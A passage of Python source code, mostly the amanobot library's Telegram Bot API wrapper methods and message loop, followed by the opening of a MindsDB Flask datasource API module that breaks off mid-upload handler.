reply_to_message_id: int = None,
allow_sending_without_reply: bool = None,
reply_markup=None):
"""
See: https://core.telegram.org/bots/api#sendaudio
:param audio: Same as ``photo`` in :meth:`amanobot.Bot.sendPhoto`
"""
p = _strip(locals(), more=['audio', 'thumb'])
return self._api_request_with_file('sendAudio', _rectify(p), {'audio': audio, 'thumb': thumb})
def sendDocument(self, chat_id: Union[int, str], document,
thumb=None,
caption: str = None,
parse_mode: str = None,
caption_entities=None,
disable_content_type_detection=None,
disable_notification: bool = None,
reply_to_message_id: int = None,
allow_sending_without_reply: bool = None,
reply_markup=None):
"""
See: https://core.telegram.org/bots/api#senddocument
:param document: Same as ``photo`` in :meth:`amanobot.Bot.sendPhoto`
"""
p = _strip(locals(), more=['document', 'thumb'])
return self._api_request_with_file('sendDocument', _rectify(p), {'document': document, 'thumb': thumb})
def sendVideo(self, chat_id: Union[int, str], video,
duration=None,
width=None,
height=None,
thumb=None,
caption: str = None,
parse_mode: str = None,
caption_entities=None,
supports_streaming=None,
disable_notification: bool = None,
reply_to_message_id: int = None,
allow_sending_without_reply: bool = None,
reply_markup=None):
"""
See: https://core.telegram.org/bots/api#sendvideo
:param video: Same as ``photo`` in :meth:`amanobot.Bot.sendPhoto`
"""
p = _strip(locals(), more=['video', 'thumb'])
return self._api_request_with_file('sendVideo', _rectify(p), {'video': video, 'thumb': thumb})
def sendAnimation(self, chat_id: Union[int, str], animation,
duration=None,
width=None,
height=None,
thumb=None,
caption: str = None,
parse_mode: str = None,
caption_entities=None,
disable_notification: bool = None,
reply_to_message_id: int = None,
allow_sending_without_reply: bool = None,
reply_markup=None):
"""
See: https://core.telegram.org/bots/api#sendanimation
:param animation: Same as ``photo`` in :meth:`amanobot.Bot.sendPhoto`
"""
p = _strip(locals(), more=['animation', 'thumb'])
return self._api_request_with_file('sendAnimation', _rectify(p), {'animation': animation, 'thumb': thumb})
def sendVoice(self, chat_id: Union[int, str], voice,
caption: str = None,
parse_mode: str = None,
caption_entities=None,
duration=None,
disable_notification: bool = None,
reply_to_message_id: int = None,
allow_sending_without_reply: bool = None,
reply_markup=None):
"""
See: https://core.telegram.org/bots/api#sendvoice
:param voice: Same as ``photo`` in :meth:`amanobot.Bot.sendPhoto`
"""
p = _strip(locals(), more=['voice'])
return self._api_request_with_file('sendVoice', _rectify(p), {'voice': voice})
def sendVideoNote(self, chat_id: Union[int, str], video_note,
duration=None,
length=None,
thumb=None,
disable_notification: bool = None,
reply_to_message_id: int = None,
allow_sending_without_reply: bool = None,
reply_markup=None):
"""
See: https://core.telegram.org/bots/api#sendvideonote
:param video_note: Same as ``photo`` in :meth:`amanobot.Bot.sendPhoto`
:param length:
Although marked as optional, this method does not seem to work without
it being specified. Supply any integer you want. It seems to have no effect
on the video note's display size.
"""
p = _strip(locals(), more=['video_note', 'thumb'])
return self._api_request_with_file('sendVideoNote', _rectify(p), {'video_note': video_note, 'thumb': thumb})
def sendMediaGroup(self, chat_id: Union[int, str], media,
disable_notification: bool = None,
reply_to_message_id: int = None,
allow_sending_without_reply: bool = None):
"""
See: https://core.telegram.org/bots/api#sendmediagroup
:type media: array of `InputMedia <https://core.telegram.org/bots/api#inputmedia>`_ objects
:param media:
To indicate media locations, each InputMedia object's ``media`` field
should be one of these:
- string: ``file_id`` for a file existing on Telegram servers
- string: HTTP URL of a file from the Internet
- file-like object: obtained by ``open(path, 'rb')``
- tuple: (form-data name, file-like object)
- tuple: (form-data name, (filename, file-like object))
In case of uploading, you may supply customized multipart/form-data
names for each uploaded file (as in last 2 options above). Otherwise,
amanobot assigns unique names to each uploaded file. Names assigned by
amanobot will not collide with user-supplied names, if any.
"""
p = _strip(locals(), more=['media'])
legal_media, files_to_attach = _split_input_media_array(media)
p['media'] = legal_media
return self._api_request('sendMediaGroup', _rectify(p), files_to_attach)
def sendLocation(self, chat_id: Union[int, str], latitude, longitude,
horizontal_accuracy=None,
live_period=None,
heading=None,
proximity_alert_radius=None,
disable_notification: bool = None,
reply_to_message_id: int = None,
allow_sending_without_reply: bool = None,
reply_markup=None):
""" See: https://core.telegram.org/bots/api#sendlocation """
p = _strip(locals())
return self._api_request('sendLocation', _rectify(p))
def editMessageLiveLocation(self, msg_identifier, latitude, longitude,
horizontal_accuracy=None,
heading=None,
proximity_alert_radius=None,
reply_markup=None):
"""
See: https://core.telegram.org/bots/api#editmessagelivelocation
:param msg_identifier: Same as in :meth:`.Bot.editMessageText`
"""
p = _strip(locals(), more=['msg_identifier'])
p.update(_dismantle_message_identifier(msg_identifier))
return self._api_request('editMessageLiveLocation', _rectify(p))
def stopMessageLiveLocation(self, msg_identifier,
reply_markup=None):
"""
See: https://core.telegram.org/bots/api#stopmessagelivelocation
:param msg_identifier: Same as in :meth:`.Bot.editMessageText`
"""
p = _strip(locals(), more=['msg_identifier'])
p.update(_dismantle_message_identifier(msg_identifier))
return self._api_request('stopMessageLiveLocation', _rectify(p))
def sendVenue(self, chat_id: Union[int, str], latitude, longitude, title, address,
foursquare_id=None,
foursquare_type=None,
disable_notification: bool = None,
reply_to_message_id: int = None,
allow_sending_without_reply: bool = None,
reply_markup=None):
""" See: https://core.telegram.org/bots/api#sendvenue """
p = _strip(locals())
return self._api_request('sendVenue', _rectify(p))
def sendContact(self, chat_id: Union[int, str], phone_number, first_name,
last_name=None,
vcard=None,
disable_notification: bool = None,
reply_to_message_id: int = None,
allow_sending_without_reply: bool = None,
reply_markup=None):
""" See: https://core.telegram.org/bots/api#sendcontact """
p = _strip(locals())
return self._api_request('sendContact', _rectify(p))
def sendPoll(self, chat_id: Union[int, str], question, options,
is_anonymous=None,
type=None,
allows_multiple_answers=None,
correct_option_id=None,
explanation=None,
explanation_parse_mode: str = None,
open_period=None,
is_closed=None,
disable_notification: bool = None,
reply_to_message_id: int = None,
allow_sending_without_reply: bool = None,
reply_markup=None):
""" See: https://core.telegram.org/bots/api#sendpoll """
p = _strip(locals())
return self._api_request('sendPoll', _rectify(p))
def sendDice(self, chat_id: Union[int, str],
emoji=None,
disable_notification: bool = None,
reply_to_message_id: int = None,
allow_sending_without_reply: bool = None,
reply_markup=None):
""" See: https://core.telegram.org/bots/api#senddice """
p = _strip(locals())
return self._api_request('sendDice', _rectify(p))
def sendGame(self, chat_id: Union[int, str], game_short_name,
disable_notification: bool = None,
reply_to_message_id: int = None,
allow_sending_without_reply: bool = None,
reply_markup=None):
""" See: https://core.telegram.org/bots/api#sendgame """
p = _strip(locals())
return self._api_request('sendGame', _rectify(p))
def sendInvoice(self, chat_id: Union[int, str], title, description, payload,
provider_token, start_parameter, currency, prices,
provider_data=None,
photo_url=None,
photo_size=None,
photo_width=None,
photo_height=None,
need_name=None,
need_phone_number=None,
need_email=None,
need_shipping_address=None,
is_flexible=None,
disable_notification: bool = None,
reply_to_message_id: int = None,
allow_sending_without_reply: bool = None,
reply_markup=None):
""" See: https://core.telegram.org/bots/api#sendinvoice """
p = _strip(locals())
return self._api_request('sendInvoice', _rectify(p))
def sendChatAction(self, chat_id: Union[int, str], action):
""" See: https://core.telegram.org/bots/api#sendchataction """
p = _strip(locals())
return self._api_request('sendChatAction', _rectify(p))
def getUserProfilePhotos(self, user_id,
offset=None,
limit=None):
""" See: https://core.telegram.org/bots/api#getuserprofilephotos """
p = _strip(locals())
return self._api_request('getUserProfilePhotos', _rectify(p))
def getFile(self, file_id):
""" See: https://core.telegram.org/bots/api#getfile """
p = _strip(locals())
return self._api_request('getFile', _rectify(p))
def kickChatMember(self, chat_id: Union[int, str], user_id,
until_date=None):
""" See: https://core.telegram.org/bots/api#kickchatmember """
p = _strip(locals())
return self._api_request('kickChatMember', _rectify(p))
def unbanChatMember(self, chat_id: Union[int, str], user_id,
only_if_banned=None):
""" See: https://core.telegram.org/bots/api#unbanchatmember """
p = _strip(locals())
return self._api_request('unbanChatMember', _rectify(p))
def restrictChatMember(self, chat_id: Union[int, str], user_id,
until_date=None,
can_send_messages=None,
can_send_media_messages=None,
can_send_polls=None,
can_send_other_messages=None,
can_add_web_page_previews=None,
can_change_info=None,
can_invite_users=None,
can_pin_messages=None,
permissions=None):
""" See: https://core.telegram.org/bots/api#restrictchatmember """
if not isinstance(permissions, dict):
permissions = dict(can_send_messages=can_send_messages,
can_send_media_messages=can_send_media_messages,
can_send_polls=can_send_polls,
can_send_other_messages=can_send_other_messages,
can_add_web_page_previews=can_add_web_page_previews,
can_change_info=can_change_info,
can_invite_users=can_invite_users,
can_pin_messages=can_pin_messages)
p = _strip(locals())
return self._api_request('restrictChatMember', _rectify(p))
def promoteChatMember(self, chat_id: Union[int, str], user_id,
can_change_info=None,
can_post_messages=None,
can_edit_messages=None,
can_delete_messages=None,
can_invite_users=None,
can_restrict_members=None,
can_pin_messages=None,
can_promote_members=None):
""" See: https://core.telegram.org/bots/api#promotechatmember """
p = _strip(locals())
return self._api_request('promoteChatMember', _rectify(p))
def setChatAdministratorCustomTitle(self, chat_id: Union[int, str], user_id,
custom_title):
""" See: https://core.telegram.org/bots/api#setchatadministratorcustomtitle """
p = _strip(locals())
return self._api_request('setChatAdministratorCustomTitle', _rectify(p))
def setChatPermissions(self, chat_id: Union[int, str],
can_send_messages=None,
can_send_media_messages=None,
can_send_polls=None,
can_send_other_messages=None,
can_add_web_page_previews=None,
can_change_info=None,
can_invite_users=None,
can_pin_messages=None,
permissions=None):
""" See: https://core.telegram.org/bots/api#setchatpermissions """
if not isinstance(permissions, dict):
permissions = dict(can_send_messages=can_send_messages,
can_send_media_messages=can_send_media_messages,
can_send_polls=can_send_polls,
can_send_other_messages=can_send_other_messages,
can_add_web_page_previews=can_add_web_page_previews,
can_change_info=can_change_info,
can_invite_users=can_invite_users,
can_pin_messages=can_pin_messages)
p = _strip(locals())
return self._api_request('setChatPermissions', _rectify(p))
def exportChatInviteLink(self, chat_id):
""" See: https://core.telegram.org/bots/api#exportchatinvitelink """
p = _strip(locals())
return self._api_request('exportChatInviteLink', _rectify(p))
def setChatPhoto(self, chat_id: Union[int, str], photo):
""" See: https://core.telegram.org/bots/api#setchatphoto """
p = _strip(locals(), more=['photo'])
return self._api_request_with_file('setChatPhoto', _rectify(p), {'photo': photo})
def deleteChatPhoto(self, chat_id):
""" See: https://core.telegram.org/bots/api#deletechatphoto """
p = _strip(locals())
return self._api_request('deleteChatPhoto', _rectify(p))
def setChatTitle(self, chat_id: Union[int, str], title):
""" See: https://core.telegram.org/bots/api#setchattitle """
p = _strip(locals())
return self._api_request('setChatTitle', _rectify(p))
def setChatDescription(self, chat_id: Union[int, str],
description=None):
""" See: https://core.telegram.org/bots/api#setchatdescription """
p = _strip(locals())
return self._api_request('setChatDescription', _rectify(p))
def pinChatMessage(self, chat_id: Union[int, str], message_id: int,
disable_notification: bool = None):
""" See: https://core.telegram.org/bots/api#pinchatmessage """
p = _strip(locals())
return self._api_request('pinChatMessage', _rectify(p))
def unpinChatMessage(self, chat_id: Union[int, str],
message_id=None):
""" See: https://core.telegram.org/bots/api#unpinchatmessage """
p = _strip(locals())
return self._api_request('unpinChatMessage', _rectify(p))
def unpinAllChatMessages(self, chat_id):
""" See: https://core.telegram.org/bots/api#unpinallchatmessages """
p = _strip(locals())
return self._api_request('unpinAllChatMessages', _rectify(p))
def leaveChat(self, chat_id):
""" See: https://core.telegram.org/bots/api#leavechat """
p = _strip(locals())
return self._api_request('leaveChat', _rectify(p))
def getChat(self, chat_id):
""" See: https://core.telegram.org/bots/api#getchat """
p = _strip(locals())
return self._api_request('getChat', _rectify(p))
def getChatAdministrators(self, chat_id):
""" See: https://core.telegram.org/bots/api#getchatadministrators """
p = _strip(locals())
return self._api_request('getChatAdministrators', _rectify(p))
def getChatMembersCount(self, chat_id):
""" See: https://core.telegram.org/bots/api#getchatmemberscount """
p = _strip(locals())
return self._api_request('getChatMembersCount', _rectify(p))
def getChatMember(self, chat_id: Union[int, str], user_id):
""" See: https://core.telegram.org/bots/api#getchatmember """
p = _strip(locals())
return self._api_request('getChatMember', _rectify(p))
def setChatStickerSet(self, chat_id: Union[int, str], sticker_set_name):
""" See: https://core.telegram.org/bots/api#setchatstickerset """
p = _strip(locals())
return self._api_request('setChatStickerSet', _rectify(p))
def deleteChatStickerSet(self, chat_id):
""" See: https://core.telegram.org/bots/api#deletechatstickerset """
p = _strip(locals())
return self._api_request('deleteChatStickerSet', _rectify(p))
def answerCallbackQuery(self, callback_query_id,
text=None,
show_alert=None,
url=None,
cache_time=None):
""" See: https://core.telegram.org/bots/api#answercallbackquery """
p = _strip(locals())
return self._api_request('answerCallbackQuery', _rectify(p))
def setMyCommands(self, commands=[]):
""" See: https://core.telegram.org/bots/api#setmycommands """
p = _strip(locals())
return self._api_request('setMyCommands', _rectify(p))
def getMyCommands(self):
""" See: https://core.telegram.org/bots/api#getmycommands """
return self._api_request('getMyCommands')
def setPassportDataErrors(self, user_id, errors):
""" See: https://core.telegram.org/bots/api#setpassportdataerrors """
p = _strip(locals())
return self._api_request('setPassportDataErrors', _rectify(p))
def answerPreCheckoutQuery(self, pre_checkout_query_id, ok,
error_message=None):
""" See: https://core.telegram.org/bots/api#answerprecheckoutquery """
p = _strip(locals())
return self._api_request('answerPreCheckoutQuery', _rectify(p))
def answerPreCheckoutQuery(self, pre_checkout_query_id, ok,
error_message=None):
""" See: https://core.telegram.org/bots/api#answerprecheckoutquery """
p = _strip(locals())
return self._api_request('answerPreCheckoutQuery', _rectify(p))
def editMessageText(self, msg_identifier, text: str,
parse_mode: str = None,
entities=None,
disable_web_page_preview: bool = None,
reply_markup=None):
"""
See: https://core.telegram.org/bots/api#editmessagetext
:param msg_identifier:
a 2-tuple (``chat_id``, ``message_id``),
a 1-tuple (``inline_message_id``),
or simply ``inline_message_id``.
You may extract this value easily with :meth:`amanobot.message_identifier`
"""
p = _strip(locals(), more=['msg_identifier'])
p.update(_dismantle_message_identifier(msg_identifier))
return self._api_request('editMessageText', _rectify(p))
def editMessageCaption(self, msg_identifier,
caption: str = None,
parse_mode: str = None,
caption_entities=None,
reply_markup=None):
"""
See: https://core.telegram.org/bots/api#editmessagecaption
:param msg_identifier: Same as ``msg_identifier`` in :meth:`amanobot.Bot.editMessageText`
"""
p = _strip(locals(), more=['msg_identifier'])
p.update(_dismantle_message_identifier(msg_identifier))
return self._api_request('editMessageCaption', _rectify(p))
def editMessageMedia(self, msg_identifier, media,
reply_markup=None):
"""
See: https://core.telegram.org/bots/api#editmessagemedia
:param msg_identifier: Same as ``msg_identifier`` in :meth:`amanobot.Bot.editMessageText`
"""
p = _strip(locals(), more=['msg_identifier', 'media'])
p.update(_dismantle_message_identifier(msg_identifier))
legal_media, files_to_attach = _split_input_media_array([media])
p['media'] = legal_media[0]
return self._api_request('editMessageMedia', _rectify(p), files_to_attach)
def editMessageReplyMarkup(self, msg_identifier,
reply_markup=None):
"""
See: https://core.telegram.org/bots/api#editmessagereplymarkup
:param msg_identifier: Same as ``msg_identifier`` in :meth:`amanobot.Bot.editMessageText`
"""
p = _strip(locals(), more=['msg_identifier'])
p.update(_dismantle_message_identifier(msg_identifier))
return self._api_request('editMessageReplyMarkup', _rectify(p))
def stopPoll(self, msg_identifier,
reply_markup=None):
"""
See: https://core.telegram.org/bots/api#stoppoll
:param msg_identifier:
a 2-tuple (``chat_id``, ``message_id``).
You may extract this value easily with :meth:`amanobot.message_identifier`
"""
p = _strip(locals(), more=['msg_identifier'])
p.update(_dismantle_message_identifier(msg_identifier))
return self._api_request('stopPoll', _rectify(p))
def deleteMessage(self, msg_identifier):
"""
See: https://core.telegram.org/bots/api#deletemessage
:param msg_identifier:
Same as ``msg_identifier`` in :meth:`amanobot.Bot.editMessageText`,
except this method does not work on inline messages.
"""
p = _strip(locals(), more=['msg_identifier'])
p.update(_dismantle_message_identifier(msg_identifier))
return self._api_request('deleteMessage', _rectify(p))
def sendSticker(self, chat_id: Union[int, str], sticker,
disable_notification: bool = None,
reply_to_message_id: int = None,
allow_sending_without_reply: bool = None,
reply_markup=None):
"""
See: https://core.telegram.org/bots/api#sendsticker
:param sticker: Same as ``photo`` in :meth:`amanobot.Bot.sendPhoto`
"""
p = _strip(locals(), more=['sticker'])
return self._api_request_with_file('sendSticker', _rectify(p), {'sticker': sticker})
def getStickerSet(self, name):
"""
See: https://core.telegram.org/bots/api#getstickerset
"""
p = _strip(locals())
return self._api_request('getStickerSet', _rectify(p))
def uploadStickerFile(self, user_id, png_sticker):
"""
See: https://core.telegram.org/bots/api#uploadstickerfile
"""
p = _strip(locals(), more=['png_sticker'])
return self._api_request_with_file('uploadStickerFile', _rectify(p), {'png_sticker': png_sticker})
def createNewStickerSet(self, user_id, name, title, emojis,
png_sticker=None,
tgs_sticker=None,
contains_masks=None,
mask_position=None):
"""
See: https://core.telegram.org/bots/api#createnewstickerset
"""
p = _strip(locals(), more=['png_sticker', 'tgs_sticker'])
return self._api_request_with_file('createNewStickerSet', _rectify(p),
{'png_sticker': png_sticker, 'tgs_sticker': tgs_sticker})
def addStickerToSet(self, user_id, name, emojis,
png_sticker=None,
tgs_sticker=None,
mask_position=None):
"""
See: https://core.telegram.org/bots/api#addstickertoset
"""
p = _strip(locals(), more=['png_sticker', 'tgs_sticker'])
return self._api_request_with_file('addStickerToSet', _rectify(p),
{'png_sticker': png_sticker, 'tgs_sticker': tgs_sticker})
def setStickerPositionInSet(self, sticker, position):
"""
See: https://core.telegram.org/bots/api#setstickerpositioninset
"""
p = _strip(locals())
return self._api_request('setStickerPositionInSet', _rectify(p))
def deleteStickerFromSet(self, sticker):
"""
See: https://core.telegram.org/bots/api#deletestickerfromset
"""
p = _strip(locals())
return self._api_request('deleteStickerFromSet', _rectify(p))
def setStickerSetThumb(self, name, user_id,
thumb=None):
"""
See: https://core.telegram.org/bots/api#setstickersetthumb
"""
p = _strip(locals(), more=['thumb'])
return self._api_request_with_file('setStickerSetThumb', _rectify(p), {'thumb': thumb})
def answerInlineQuery(self, inline_query_id, results,
cache_time=None,
is_personal=None,
next_offset=None,
switch_pm_text=None,
switch_pm_parameter=None):
""" See: https://core.telegram.org/bots/api#answerinlinequery """
p = _strip(locals())
return self._api_request('answerInlineQuery', _rectify(p))
def getUpdates(self,
offset=None,
limit=None,
timeout=None,
allowed_updates=None,
_raise_errors=None):
""" See: https://core.telegram.org/bots/api#getupdates """
if _raise_errors is None:
_raise_errors = self._raise_errors
p = _strip(locals())
return self._api_request('getUpdates', _rectify(p), raise_errors=_raise_errors)
def setWebhook(self,
url=None,
certificate=None,
ip_address=None,
max_connections=None,
allowed_updates=None,
drop_pending_updates=None):
""" See: https://core.telegram.org/bots/api#setwebhook """
p = _strip(locals(), more=['certificate'])
if certificate:
files = {'certificate': certificate}
return self._api_request('setWebhook', _rectify(p), files)
return self._api_request('setWebhook', _rectify(p))
def deleteWebhook(self,
drop_pending_updates=None):
p = _strip(locals())
""" See: https://core.telegram.org/bots/api#deletewebhook """
return self._api_request('deleteWebhook', _rectify(p))
def getWebhookInfo(self):
""" See: https://core.telegram.org/bots/api#getwebhookinfo """
return self._api_request('getWebhookInfo')
def setGameScore(self, user_id, score, game_message_identifier,
force=None,
disable_edit_message=None):
"""
See: https://core.telegram.org/bots/api#setgamescore
:param game_message_identifier: Same as ``msg_identifier`` in :meth:`amanobot.Bot.editMessageText`
"""
p = _strip(locals(), more=['game_message_identifier'])
p.update(_dismantle_message_identifier(game_message_identifier))
return self._api_request('setGameScore', _rectify(p))
def getGameHighScores(self, user_id, game_message_identifier):
"""
See: https://core.telegram.org/bots/api#getgamehighscores
:param game_message_identifier: Same as ``msg_identifier`` in :meth:`amanobot.Bot.editMessageText`
"""
p = _strip(locals(), more=['game_message_identifier'])
p.update(_dismantle_message_identifier(game_message_identifier))
return self._api_request('getGameHighScores', _rectify(p))
def download_file(self, file_id, dest):
"""
Download a file to local disk.
:param dest: a path or a ``file`` object
"""
f = self.getFile(file_id)
try:
d = dest if _isfile(dest) else open(dest, 'wb')
r = api.download((self._base_url, self._token, f['file_path']), preload_content=False)
while 1:
data = r.read(self._file_chunk_size)
if not data:
break
d.write(data)
finally:
if not _isfile(dest) and 'd' in locals():
d.close()
if 'r' in locals():
r.release_conn()
def message_loop(self, callback=None, relax=0.1,
timeout=20, allowed_updates=None,
source=None, ordered=True, maxhold=3,
run_forever=False):
"""
:deprecated: will be removed in future. Use :class:`.MessageLoop` instead.
Spawn a thread to constantly ``getUpdates`` or pull updates from a queue.
Apply ``callback`` to every message received. Also starts the scheduler thread
for internal events.
:param callback:
a function that takes one argument (the message), or a routing table.
If ``None``, the bot's ``handle`` method is used.
A *routing table* is a dictionary of ``{flavor: function}``, mapping messages to appropriate
handler functions according to their flavors. It allows you to define functions specifically
to handle one flavor of messages. It usually looks like this: ``{'chat': fn1,
'callback_query': fn2, 'inline_query': fn3, ...}``. Each handler function should take
one argument (the message).
:param source:
Source of updates.
If ``None``, ``getUpdates`` is used to obtain new messages from Telegram servers.
If it is a synchronized queue, new messages are pulled from the queue.
A web application implementing a webhook can dump updates into the queue,
while the bot pulls from it. This is how amanobot can be integrated with webhooks.
Acceptable contents in queue:
- ``str`` or ``bytes`` (decoded using UTF-8)
representing a JSON-serialized `Update <https://core.telegram.org/bots/api#update>`_ object.
- a ``dict`` representing an Update object.
When ``source`` is ``None``, these parameters are meaningful:
:type relax: float
:param relax: seconds between each ``getUpdates``
:type timeout: int
:param timeout:
``timeout`` parameter supplied to :meth:`amanobot.Bot.getUpdates`,
controlling how long to poll.
:type allowed_updates: array of string
:param allowed_updates:
``allowed_updates`` parameter supplied to :meth:`amanobot.Bot.getUpdates`,
controlling which types of updates to receive.
When ``source`` is a queue, these parameters are meaningful:
:type ordered: bool
:param ordered:
If ``True``, ensure in-order delivery of messages to ``callback``
(i.e. updates with a smaller ``update_id`` always come before those with
a larger ``update_id``).
If ``False``, no re-ordering is done. ``callback`` is applied to messages
as soon as they are pulled from queue.
:type maxhold: float
:param maxhold:
Applied only when ``ordered`` is ``True``. The maximum number of seconds
an update is held waiting for a not-yet-arrived smaller ``update_id``.
When this number of seconds is up, the update is delivered to ``callback``
even if some smaller ``update_id``\s have not yet arrived. If those smaller
``update_id``\s arrive at some later time, they are discarded.
Finally, there is this parameter, meaningful always:
:type run_forever: bool or str
:param run_forever:
If ``True`` or any non-empty string, append an infinite loop at the end of
this method, so it never returns. Useful as the very last line in a program.
A non-empty string will also be printed, useful as an indication that the
program is listening.
"""
if callback is None:
callback = self.handle
elif isinstance(callback, dict):
callback = flavor_router(callback)
collect_queue = queue.Queue()
def collector():
while 1:
try:
item = collect_queue.get(block=True)
callback(item)
except:
# Localize error so thread can keep going.
traceback.print_exc()
def relay_to_collector(update):
key = _find_first_key(update, ['message',
'edited_message',
'poll',
'channel_post',
'edited_channel_post',
'callback_query',
'inline_query',
'chosen_inline_result',
'shipping_query',
'pre_checkout_query'])
collect_queue.put(update[key])
return update['update_id']
def get_from_telegram_server():
offset = None # running offset
allowed_upd = allowed_updates
while 1:
try:
result = self.getUpdates(offset=offset,
timeout=timeout,
allowed_updates=allowed_upd,
_raise_errors=True)
# Once passed, this parameter is no longer needed.
allowed_upd = None
if len(result) > 0:
# No sort. Trust server to give messages in correct order.
# Update offset to max(update_id) + 1
offset = max([relay_to_collector(update) for update in result]) + 1
except exception.BadHTTPResponse as e:
traceback.print_exc()
# Servers probably down. Wait longer.
if e.status == 502:
time.sleep(30)
except:
traceback.print_exc()
finally:
time.sleep(relax)
def dictify(data):
if type(data) is bytes:
return json.loads(data.decode('utf-8'))
if type(data) is str:
return json.loads(data)
if type(data) is dict:
return data
raise ValueError()
def get_from_queue_unordered(qu):
while 1:
try:
data = qu.get(block=True)
update = dictify(data)
relay_to_collector(update)
except:
traceback.print_exc()
def get_from_queue(qu):
# Here is the re-ordering mechanism, ensuring in-order delivery of updates.
max_id = None # max update_id passed to callback
buffer = collections.deque() # keep those updates which skip some update_id
qwait = None # how long to wait for updates,
# because buffer's content has to be returned in time.
while 1:
try:
data = qu.get(block=True, timeout=qwait)
update = dictify(data)
if max_id is None:
# First message received, handle regardless.
max_id = relay_to_collector(update)
elif update['update_id'] == max_id + 1:
# No update_id skipped, handle naturally.
max_id = relay_to_collector(update)
# clear contagious updates in buffer
if len(buffer) > 0:
buffer.popleft() # first element belongs to update just received, useless now.
while 1:
try:
if type(buffer[0]) is dict:
max_id = relay_to_collector(
buffer.popleft()) # updates that arrived earlier, handle them.
else:
break # gap, no more contagious updates
except IndexError:
break # buffer empty
elif update['update_id'] > max_id + 1:
# Update arrives pre-maturely, insert to buffer.
nbuf = len(buffer)
if update['update_id'] <= max_id + nbuf:
# buffer long enough, put update at position
buffer[update['update_id'] - max_id - 1] = update
else:
# buffer too short, lengthen it
expire = time.time() + maxhold
for a in range(nbuf, update['update_id'] - max_id - 1):
buffer.append(expire) # put expiry time in gaps
buffer.append(update)
else:
pass # discard
except queue.Empty:
# debug message
# print('Timeout')
# some buffer contents have to be handled
# flush buffer until a non-expired time is encountered
while 1:
try:
if type(buffer[0]) is dict:
max_id = relay_to_collector(buffer.popleft())
else:
expire = buffer[0]
if expire <= time.time():
max_id += 1
buffer.popleft()
else:
break # non-expired
except IndexError:
break # buffer empty
except:
traceback.print_exc()
finally:
try:
# don't wait longer than next expiry time
qwait = buffer[0] - time.time()
qwait = max(qwait, 0)
except IndexError:
# buffer empty, can wait forever
qwait = None
# debug message
# print ('Buffer:', str(buffer), ', To Wait:', qwait, ', Max ID:', max_id)
collector_thread = threading.Thread(target=collector)
collector_thread.daemon = True
collector_thread.start()
if source is None:
message_thread = threading.Thread(target=get_from_telegram_server)
elif isinstance(source, queue.Queue):
if ordered:
message_thread = threading.Thread(target=get_from_queue, args=(source,))
else:
message_thread = threading.Thread(target=get_from_queue_unordered, args=(source,))
else:
raise ValueError('Invalid source')
message_thread.daemon = True # need this for main thread to be killable by Ctrl-C
message_thread.start()
self._scheduler.on_event(collect_queue.put)
self._scheduler.run_as_thread()
if run_forever:
if _isstring(run_forever):
print(run_forever)
while 1:
time.sleep(10)
class SpeakerBot(Bot):
def __init__(self, token):
super(SpeakerBot, self).__init__(token)
self._mic = helper.Microphone()
@property
def mic(self):
return self._mic
def create_listener(self):
q = queue.Queue()
self._mic.add(q)
ln = helper.Listener(self._mic, q)
return ln
class DelegatorBot(SpeakerBot):
def __init__(self, token, delegation_patterns):
"""
:param delegation_patterns: a list of (seeder, delegator) tuples.
"""
super(DelegatorBot, self).__init__(token)
self._delegate_records = [p + ({},) for p in delegation_patterns]
@staticmethod
def _startable(delegate):
return ((hasattr(delegate, 'start') and inspect.ismethod(delegate.start)) and
(hasattr(delegate, 'is_alive') and inspect.ismethod(delegate.is_alive)))
@staticmethod
def _tuple_is_valid(t):
return len(t) == 3 and callable(t[0]) and type(t[1]) in [list, tuple] and type(t[2]) is dict
def _ensure_startable(self, delegate):
if self._startable(delegate):
return delegate
if callable(delegate):
return threading.Thread(target=delegate)
if type(delegate) is tuple and self._tuple_is_valid(delegate):
func, args, kwargs = delegate
return threading.Thread(target=func, args=args, kwargs=kwargs)
raise RuntimeError(
'Delegate does not have the required methods, is not callable, and is not a valid tuple.')
def handle(self, msg):
self._mic.send(msg)
for calculate_seed, make_delegate, dict in self._delegate_records:
id = calculate_seed(msg)
if id is None:
continue
elif isinstance(id, collections.Hashable):
if id not in dict or not dict[id].is_alive():
d = make_delegate((self, msg, id))
d = self._ensure_startable(d)
dict[id] = d
dict[id].start()
else:
d = make_delegate((self, msg, id))
d = self._ensure_startable(d)
d.start()
|
datasource.py
|
import os
import threading
import tempfile
import re
import multipart
import zipfile
import tarfile
import shutil
from pathlib import Path
import mysql.connector
from flask import request, send_file
from flask_restx import Resource, abort # 'abort' using to return errors as json: {'message': 'error text'}
from mindsdb.utilities.config import Config
from mindsdb.utilities.log import log
from mindsdb.api.http.utils import http_error
from mindsdb.api.http.namespaces.configs.datasources import ns_conf
from mindsdb.api.http.namespaces.entitites.datasources.datasource import (
put_datasource_params
)
from mindsdb.api.http.namespaces.entitites.datasources.datasource_data import (
get_datasource_rows_params
)
def parse_filter(key, value):
result = re.search(r'filter(_*.*)\[(.*)\]', key)
operator = result.groups()[0].strip('_') or 'like'
field = result.groups()[1]
operators_map = {
'like': 'like',
'in': 'in',
'nin': 'not in',
'gt': '>',
'lt': '<',
'gte': '>=',
'lte': '<=',
'eq': '=',
'neq': '!='
}
if operator not in operators_map:
return None
operator = operators_map[operator]
return [field, operator, value]
@ns_conf.route('/')
class DatasourcesList(Resource):
@ns_conf.doc('get_datasources_list')
def get(self):
'''List all datasets'''
return request.default_store.get_datasets()
@ns_conf.route('/<name>')
@ns_conf.param('name', 'Datasource name')
class Datasource(Resource):
@ns_conf.doc('get_datasource')
def get(self, name):
'''return datasource metadata'''
ds = request.default_store.get_datasource(name)
if ds is not None:
return ds
return '', 404
@ns_conf.doc('delete_datasource')
def delete(self, name):
'''delete datasource'''
try:
request.default_store.delete_datasource(name)
except Exception as e:
log.error(e)
return http_error(
400,
"Error deleting datasource",
f"There was an error while tring to delete datasource with name '{name}'"
)
return '', 200
@ns_conf.doc('put_datasource', params=put_datasource_params)
def put(self, name):
'''add new datasource'''
data = {}
def on_field(field):
name = field.field_name.decode()
value = field.value.decode()
data[name] = value
file_object = None
def on_file(file):
nonlocal file_object
data['file'] = file.file_name.decode()
file_object = file.file_object
temp_dir_path = tempfile.mkdtemp(prefix='datasource_file_')
if request.headers['Content-Type'].startswith('multipart/form-data'):
parser = multipart.create_form_parser(
headers=request.headers,
on_field=on_field,
on_file=on_file,
config={
'UPLOAD_DIR': temp_dir_path.encode(), # bytes required
'UPLOAD_KEEP_FILENAME': True,
'UPLOAD_KEEP_EXTENSIONS': True,
'MAX_MEMORY_FILE_SIZE': 0
}
)
while True:
